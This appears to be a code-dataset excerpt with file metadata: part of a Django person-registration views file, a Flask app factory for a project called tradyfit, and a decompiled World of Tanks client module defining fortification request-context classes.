form = RegistrarForms(request.POST or None, instance=cadastrao)
if form.is_valid():
form.save()
return redirect('pessoasCadastradas')
return render(request, 'pessoasCadastradas.html', {'form':form , 'data':data})
def deletar_pessoas(request,id):
cadastrao = CadastroPessoas.objects.get(id=id)
cadastrao.delete()
return redirect('pessoasCadastradas')
'''
def registar(request):
if request.method == 'POST':
form = CadastroPessoas(request.POST)
if form.is_valid():
user = form.save()
user.save()
return redirect('/pessoas/')
else:
form = RegisterForm()
return render(request, 'formulario.html', {'register_form': form})
def pessoas_registradas(request):
registers = CadastroPessoas.objects.all()
if request.method == 'POST':
form = FilterForm(request.POST or None)
if form.is_valid():
context = {
'nome': request.POST['nome'],
'sobrenome': request.POST['sobrenome'],
'city': request.POST['city'],
}
if context['idade']:
age_choosed = re.sub("[''{ birthday: datetime.date()}]", '', context['age'])
age_choosed = re.sub('[,]', '-', age_choosed)
registers = CadastroPessoas.objects.filter(birthday=age_choosed)
elif context['city']:
registers = CadastroPessoas.objects.filter(city=form.cleaned_data.get('city'))
elif request.POST['gender']:
registers = CadastroPessoas.objects.filter(gender=form.cleaned_data.get('gender'))
else:
form = FilterForm()
return render(request, 'pessoasCadastradas.html', {'registers': registers, 'form_filter': form})
'''
|
[
"diego.bonani20@gmail.com"
] |
diego.bonani20@gmail.com
|
43c973225f1208537375399480ae546624b06c26
|
421a94f2c4c57366d1c61d80226060629f93ee93
|
/vagrant/tradyfit/app/__init__.py
|
70142dcae203d950355a051784e19130495261f0
|
[
"MIT"
] |
permissive
|
rosariomgomez/tradyfit
|
ae8c966f134acba1385a995d9c4bf8a4e48c7175
|
a61175729b70a194f874197848f1cbad1061e3d0
|
refs/heads/master
| 2020-12-24T13:52:46.311601
| 2015-05-07T21:05:13
| 2015-05-07T21:05:13
| 31,042,365
| 2
| 1
| null | 2015-04-19T22:27:39
| 2015-02-19T23:25:37
|
Python
|
UTF-8
|
Python
| false
| false
| 1,538
|
py
|
from flask import Flask
from flask.ext.bootstrap import Bootstrap
from flask_jsglue import JSGlue
from flask.ext.sqlalchemy import SQLAlchemy
from flask.ext.login import LoginManager
from flask.ext.moment import Moment
from flask_limiter import Limiter
from flask.ext.mobility import Mobility
from opbeat.contrib.flask import Opbeat
from config import config
import geonamescache
from geopy.geocoders import GoogleV3
bootstrap = Bootstrap()
db = SQLAlchemy()
moment = Moment()
gc = geonamescache.GeonamesCache()
geolocator = GoogleV3()
jsglue = JSGlue()
limiter = Limiter()
opbeat = Opbeat()
login_manager = LoginManager()
login_manager.login_view = 'main.index'
def create_app(config_name):
app = Flask(__name__)
app.config.from_object(config[config_name])
config[config_name].init_app(app)
bootstrap.init_app(app)
moment.init_app(app)
db.init_app(app)
login_manager.init_app(app)
jsglue.init_app(app)
limiter.init_app(app)
Mobility(app)
opbeat.init_app(app)
from .admin import admin as admin_blueprint
app.register_blueprint(admin_blueprint, url_prefix='/admin')
from .main import main as main_blueprint
app.register_blueprint(main_blueprint)
from .auth import auth as auth_blueprint
app.register_blueprint(auth_blueprint)
from .msg import msg as msg_blueprint
app.register_blueprint(msg_blueprint)
from .public_api_1_0 import public_api as public_api_1_0_blueprint
app.register_blueprint(public_api_1_0_blueprint,
url_prefix='/public-api/v1.0')
return app
|
[
"rosario.mgomez@gmail.com"
] |
rosario.mgomez@gmail.com
|
2b38f756de000137ddfe4d824dbe8a15a7426bf0
|
77311ad9622a7d8b88707d7cee3f44de7c8860cb
|
/res/scripts/client/gui/shared/fortifications/context.py
|
5e9d38fbfb87ce72169db08d58c8b43d18c10d4e
|
[] |
no_license
|
webiumsk/WOT-0.9.14-CT
|
9b193191505a4560df4e872e022eebf59308057e
|
cfe0b03e511d02c36ce185f308eb48f13ecc05ca
|
refs/heads/master
| 2021-01-10T02:14:10.830715
| 2016-02-14T11:59:59
| 2016-02-14T11:59:59
| 51,606,676
| 0
| 0
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 15,527
|
py
|
# 2016.02.14 12:41:26 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/shared/fortifications/context.py
from constants import REQUEST_COOLDOWN, PREBATTLE_TYPE
from gui.prb_control.context import PrbCtrlRequestCtx
from gui.prb_control import settings as prb_settings
from gui.prb_control.prb_getters import getUnitIdx
from gui.shared.fortifications.settings import FORT_REQUEST_TYPE
from gui.shared.utils.decorators import ReprInjector
from gui.shared.utils.requesters import RequestCtx
@ReprInjector.withParent(('__isUpdateExpected', 'isUpdateExpected'))
class FortRequestCtx(RequestCtx):
def __init__(self, waitingID = '', isUpdateExpected = False):
super(FortRequestCtx, self).__init__(waitingID)
self.__isUpdateExpected = isUpdateExpected
def isUpdateExpected(self):
return self.__isUpdateExpected
def getCooldown(self):
return REQUEST_COOLDOWN.CALL_FORT_METHOD
def _setUpdateExpected(self, value):
self.__isUpdateExpected = value
class CreateFortCtx(FortRequestCtx):
def __init__(self, waitingID = ''):
super(CreateFortCtx, self).__init__(waitingID, True)
def getRequestType(self):
return FORT_REQUEST_TYPE.CREATE_FORT
class DeleteFortCtx(FortRequestCtx):
def __init__(self, waitingID = ''):
super(DeleteFortCtx, self).__init__(waitingID, True)
def getRequestType(self):
return FORT_REQUEST_TYPE.DELETE_FORT
@ReprInjector.withParent(('__direction', 'direction'), ('__isOpen', 'isOpen'))
class DirectionCtx(FortRequestCtx):
def __init__(self, direction, isOpen = True, waitingID = ''):
super(DirectionCtx, self).__init__(waitingID, True)
self.__direction = direction
self.__isOpen = isOpen
def getRequestType(self):
if self.__isOpen:
return FORT_REQUEST_TYPE.OPEN_DIRECTION
return FORT_REQUEST_TYPE.CLOSE_DIRECTION
def getDirection(self):
return self.__direction
@ReprInjector.withParent(('__buildingTypeID', 'buildingTypeID'), ('__direction', 'direction'), ('__position', 'position'), ('__isAdd', 'isAdd'))
class BuildingCtx(FortRequestCtx):
def __init__(self, buildingTypeID, direction = None, position = None, isAdd = True, waitingID = ''):
super(BuildingCtx, self).__init__(waitingID, True)
self.__buildingTypeID = buildingTypeID
self.__direction = direction
self.__position = position
self.__isAdd = isAdd
def getRequestType(self):
if self.__isAdd:
return FORT_REQUEST_TYPE.ADD_BUILDING
return FORT_REQUEST_TYPE.DELETE_BUILDING
def getDirection(self):
return self.__direction
def getPosition(self):
return self.__position
def getBuildingTypeID(self):
return self.__buildingTypeID
@ReprInjector.withParent(('__fromBuildingTypeID', 'fromBuildingTypeID'), ('__toBuildingTypeID', 'toBuildingTypeID'), ('__resCount', 'resCount'))
class TransportationCtx(FortRequestCtx):
def __init__(self, fromBuildingTypeID, toBuildingTypeID, resCount, waitingID = ''):
super(TransportationCtx, self).__init__(waitingID, True)
self.__fromBuildingTypeID = fromBuildingTypeID
self.__toBuildingTypeID = toBuildingTypeID
self.__resCount = resCount
def getRequestType(self):
return FORT_REQUEST_TYPE.TRANSPORTATION
def getFromBuildingTypeID(self):
return self.__fromBuildingTypeID
def getToBuildingTypeID(self):
return self.__toBuildingTypeID
def getResCount(self):
return self.__resCount
@ReprInjector.withParent(('__orderTypeID', 'orderTypeID'), ('__count', 'count'), ('__isAdd', 'isAdd'))
class OrderCtx(FortRequestCtx):
def __init__(self, orderTypeID, count = 1, isAdd = True, waitingID = ''):
super(OrderCtx, self).__init__(waitingID, True)
self.__orderTypeID = orderTypeID
self.__count = count
self.__isAdd = isAdd
def getRequestType(self):
if self.__isAdd:
return FORT_REQUEST_TYPE.ADD_ORDER
return FORT_REQUEST_TYPE.ACTIVATE_ORDER
def getOrderTypeID(self):
return self.__orderTypeID
def getCount(self):
return self.__count
@ReprInjector.withParent(('__buildingTypeID', 'buildingTypeID'))
class AttachCtx(FortRequestCtx):
def __init__(self, buildingTypeID, waitingID = ''):
super(AttachCtx, self).__init__(waitingID, True)
self.__buildingTypeID = buildingTypeID
def getRequestType(self):
return FORT_REQUEST_TYPE.ATTACH
def getBuildingTypeID(self):
return self.__buildingTypeID
@ReprInjector.withParent(('__buildingTypeID', 'buildingTypeID'))
class UpgradeCtx(FortRequestCtx):
def __init__(self, buildingTypeID, waitingID = ''):
super(UpgradeCtx, self).__init__(waitingID, True)
self.__buildingTypeID = buildingTypeID
def getRequestType(self):
return FORT_REQUEST_TYPE.UPGRADE
def getBuildingTypeID(self):
return self.__buildingTypeID
@ReprInjector.withParent(('__divisionLevel', 'divisionLevel'))
class CreateSortieCtx(FortRequestCtx):
def __init__(self, divisionLevel = 10, waitingID = ''):
super(CreateSortieCtx, self).__init__(waitingID)
self.__divisionLevel = divisionLevel
def getRequestType(self):
return FORT_REQUEST_TYPE.CREATE_SORTIE
def getDivisionLevel(self):
return self.__divisionLevel
def __repr__(self):
return 'CreateSortieCtx(buildingTypeID={0:n}, waitingID={1:>s})'.format(self.__divisionLevel, self.getWaitingID())
@ReprInjector.withParent(('__unitMgrID', 'unitMgrID'), ('__peripheryID', 'peripheryID'))
class RequestSortieUnitCtx(FortRequestCtx):
def __init__(self, unitMgrID, peripheryID, waitingID = ''):
super(RequestSortieUnitCtx, self).__init__(waitingID)
self.__unitMgrID = unitMgrID
self.__peripheryID = peripheryID
def getRequestType(self):
return FORT_REQUEST_TYPE.REQUEST_SORTIE_UNIT
def getCooldown(self):
return REQUEST_COOLDOWN.GET_FORT_SORTIE_DATA
def getUnitMgrID(self):
return self.__unitMgrID
def getPeripheryID(self):
return self.__peripheryID
def __repr__(self):
return 'RequestSortieUnitCtx(unitMgrID={0:n}, peripheryID={1:n}, waitingID={2:>s})'.format(self.__unitMgrID, self.__peripheryID, self.getWaitingID())
@ReprInjector.withParent(('_defenceHour', 'defenceHour'))
class DefenceHourCtx(FortRequestCtx):
def __init__(self, defenceHour, waitingID = ''):
super(DefenceHourCtx, self).__init__(waitingID)
self._defenceHour = defenceHour
def getRequestType(self):
return FORT_REQUEST_TYPE.CHANGE_DEF_HOUR
def getDefenceHour(self):
return self._defenceHour
@ReprInjector.withParent(('_offDay', 'offDay'))
class OffDayCtx(FortRequestCtx):
def __init__(self, offDay, waitingID = ''):
super(OffDayCtx, self).__init__(waitingID)
self._offDay = offDay
def getRequestType(self):
return FORT_REQUEST_TYPE.CHANGE_OFF_DAY
def getOffDay(self):
return self._offDay
@ReprInjector.withParent(('_peripheryID', 'peripheryID'))
class PeripheryCtx(FortRequestCtx):
def __init__(self, peripheryID, waitingID = ''):
super(PeripheryCtx, self).__init__(waitingID)
self._peripheryID = peripheryID
def getRequestType(self):
return FORT_REQUEST_TYPE.CHANGE_PERIPHERY
def getPeripheryID(self):
return self._peripheryID
@ReprInjector.withParent(('_timeVacationStart', 'timeVacationStart'), ('_vacationDuration', 'vacationDuration'))
class VacationCtx(FortRequestCtx):
def __init__(self, timeVacationStart, vacationDuration, waitingID = ''):
super(VacationCtx, self).__init__(waitingID)
self._timeVacationStart = timeVacationStart
self._vacationDuration = vacationDuration
def getRequestType(self):
return FORT_REQUEST_TYPE.CHANGE_VACATION
def getTimeVacationStart(self):
return self._timeVacationStart
def getTimeVacationEnd(self):
return self.getTimeVacationStart() + self.getTimeVacationDuration()
def getTimeVacationDuration(self):
return self._vacationDuration
class SettingsCtx(DefenceHourCtx, OffDayCtx, PeripheryCtx):
def __init__(self, defenceHour, offDay, peripheryID, waitingID = ''):
DefenceHourCtx.__init__(self, defenceHour, waitingID)
OffDayCtx.__init__(self, offDay, waitingID)
PeripheryCtx.__init__(self, peripheryID, waitingID)
def getRequestType(self):
return FORT_REQUEST_TYPE.CHANGE_SETTINGS
@ReprInjector.withParent(('_shutDown', 'shutDown'))
class DefencePeriodCtx(FortRequestCtx):
def __init__(self, shutDown = True, waitingID = ''):
super(DefencePeriodCtx, self).__init__(waitingID)
self._shutDown = shutDown
def getRequestType(self):
if self._shutDown:
return FORT_REQUEST_TYPE.SHUTDOWN_DEF_HOUR
else:
return FORT_REQUEST_TYPE.CANCEL_SHUTDOWN_DEF_HOUR
@ReprInjector.withParent(('_filterType', 'filterType'), ('_abbrevPattern', 'abbrevPattern'), ('_limit', 'limit'), ('_lvlFrom', 'lvlFrom'), ('_lvlTo', 'lvlTo'), ('_extStartDefHourFrom', 'extStartDefHourFrom'), ('_extStartDefHourTo', 'extStartDefHourTo'), ('_attackDay', 'attackDay'), ('_firstDefaultQuery', 'firstDefaultQuery'), ('getWaitingID', 'waitingID'))
class FortPublicInfoCtx(FortRequestCtx):
def __init__(self, filterType, abbrevPattern, limit, lvlFrom, lvlTo, extStartDefHourFrom, extStartDefHourTo, attackDay, firstDefaultQuery = False, waitingID = ''):
super(FortPublicInfoCtx, self).__init__(waitingID)
self._filterType = filterType
self._abbrevPattern = abbrevPattern
self._limit = limit
self._lvlFrom = lvlFrom
self._lvlTo = lvlTo
self._extStartDefHourFrom = extStartDefHourFrom
self._extStartDefHourTo = extStartDefHourTo
self._attackDay = attackDay
self._firstDefaultQuery = firstDefaultQuery
def getRequestType(self):
return FORT_REQUEST_TYPE.REQUEST_PUBLIC_INFO
def getCooldown(self):
return REQUEST_COOLDOWN.REQUEST_FORT_PUBLIC_INFO
def getFilterType(self):
return self._filterType
def getAbbrevPattern(self):
return self._abbrevPattern
def getLimit(self):
return self._limit
def getLvlFrom(self):
return self._lvlFrom
def getLvlTo(self):
return self._lvlTo
def getStartDefHourFrom(self):
return self._extStartDefHourFrom
def getStartDefHourTo(self):
return self._extStartDefHourTo
def getAttackDay(self):
return self._attackDay
def isFirstDefaultQuery(self):
return self._firstDefaultQuery
@ReprInjector.withParent(('__clanDBID', 'clanDBID'))
class RequestClanCardCtx(FortRequestCtx):
def __init__(self, clanDBID, waitingID = ''):
super(RequestClanCardCtx, self).__init__(waitingID)
self.__clanDBID = clanDBID
def getRequestType(self):
return FORT_REQUEST_TYPE.REQUEST_CLAN_CARD
def getClanDBID(self):
return self.__clanDBID
def __repr__(self):
return 'RequestClanCardCtx(clanDBID={0:n}, waitingID={1:>s})'.format(self.__clanDBID, self.getWaitingID())
@ReprInjector.withParent(('__clanDBID', 'clanDBID'), ('__isAdd', 'isAdd'))
class FavoriteCtx(FortRequestCtx):
def __init__(self, clanDBID, isAdd = True, waitingID = ''):
super(FavoriteCtx, self).__init__(waitingID)
self.__clanDBID = clanDBID
self.__isAdd = isAdd
def getClanDBID(self):
return self.__clanDBID
def getRequestType(self):
if self.__isAdd:
return FORT_REQUEST_TYPE.ADD_FAVORITE
else:
return FORT_REQUEST_TYPE.REMOVE_FAVORITE
@ReprInjector.withParent(('__clanDBID', 'clanDBID'), ('__timeAttack', 'timeAttack'), ('__dirFrom', 'dirFrom'), ('__dirTo', 'dirTo'))
class AttackCtx(FortRequestCtx):
def __init__(self, clanDBID, timeAttack, dirFrom, dirTo, waitingID = ''):
super(AttackCtx, self).__init__(waitingID)
self.__clanDBID = clanDBID
self.__timeAttack = timeAttack
self.__dirFrom = dirFrom
self.__dirTo = dirTo
def getClanDBID(self):
return self.__clanDBID
def getTimeAttack(self):
return self.__timeAttack
def getDirFrom(self):
return self.__dirFrom
def getDirTo(self):
return self.__dirTo
def getRequestType(self):
return FORT_REQUEST_TYPE.PLAN_ATTACK
@ReprInjector.withParent(('__battleID', 'battleID'), ('__slotIdx', 'slotIdx'))
class CreateOrJoinFortBattleCtx(PrbCtrlRequestCtx):
__slots__ = ('__battleID', '__slotIdx', '__isUpdateExpected')
def __init__(self, battleID, slotIdx = -1, waitingID = '', isUpdateExpected = False, flags = prb_settings.FUNCTIONAL_FLAG.UNDEFINED):
super(CreateOrJoinFortBattleCtx, self).__init__(ctrlType=prb_settings.CTRL_ENTITY_TYPE.UNIT, entityType=PREBATTLE_TYPE.FORT_BATTLE, waitingID=waitingID, flags=flags, isForced=True)
self.__battleID = battleID
self.__slotIdx = slotIdx
self.__isUpdateExpected = isUpdateExpected
def isUpdateExpected(self):
return self.__isUpdateExpected
def getCooldown(self):
return REQUEST_COOLDOWN.CALL_FORT_METHOD
def getUnitIdx(self):
return getUnitIdx()
def getRequestType(self):
return FORT_REQUEST_TYPE.CREATE_OR_JOIN_FORT_BATTLE
def getID(self):
return self.__battleID
def getSlotIdx(self):
return self.__slotIdx
def _setUpdateExpected(self, value):
self.__isUpdateExpected = value
@ReprInjector.withParent(('__consumableOrderTypeID', 'consumableOrderTypeID'), ('__slotIdx', 'slotIdx'))
class ActivateConsumableCtx(FortRequestCtx):
def __init__(self, consumableOrderTypeID, slotIdx, waitingID = ''):
super(ActivateConsumableCtx, self).__init__(waitingID)
self.__consumableOrderTypeID = consumableOrderTypeID
self.__slotIdx = slotIdx
def getConsumableOrderTypeID(self):
return self.__consumableOrderTypeID
def getSlotIdx(self):
return self.__slotIdx
def getRequestType(self):
return FORT_REQUEST_TYPE.ACTIVATE_CONSUMABLE
@ReprInjector.withParent(('__consumableOrderTypeID', 'consumableOrderTypeID'))
class ReturnConsumableCtx(FortRequestCtx):
def __init__(self, consumableOrderTypeID, waitingID = ''):
super(ReturnConsumableCtx, self).__init__(waitingID)
self.__consumableOrderTypeID = consumableOrderTypeID
def getConsumableOrderTypeID(self):
return self.__consumableOrderTypeID
def getRequestType(self):
return FORT_REQUEST_TYPE.RETURN_CONSUMABLE
__all__ = ('FortRequestCtx', 'CreateFortCtx', 'DeleteFortCtx', 'DirectionCtx', 'BuildingCtx', 'TransportationCtx', 'OrderCtx', 'AttachCtx', 'OrderCtx', 'UpgradeCtx', 'CreateSortieCtx', 'RequestSortieUnitCtx', 'DefenceHourCtx', 'OffDayCtx', 'PeripheryCtx', 'VacationCtx', 'SettingsCtx', 'FortPublicInfoCtx', 'RequestClanCardCtx', 'FavoriteCtx', 'CreateOrJoinFortBattleCtx', 'ActivateConsumableCtx', 'ReturnConsumableCtx')
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\shared\fortifications\context.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.02.14 12:41:26 Střední Evropa (běžný čas)
|
[
"info@webium.sk"
] |
info@webium.sk
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.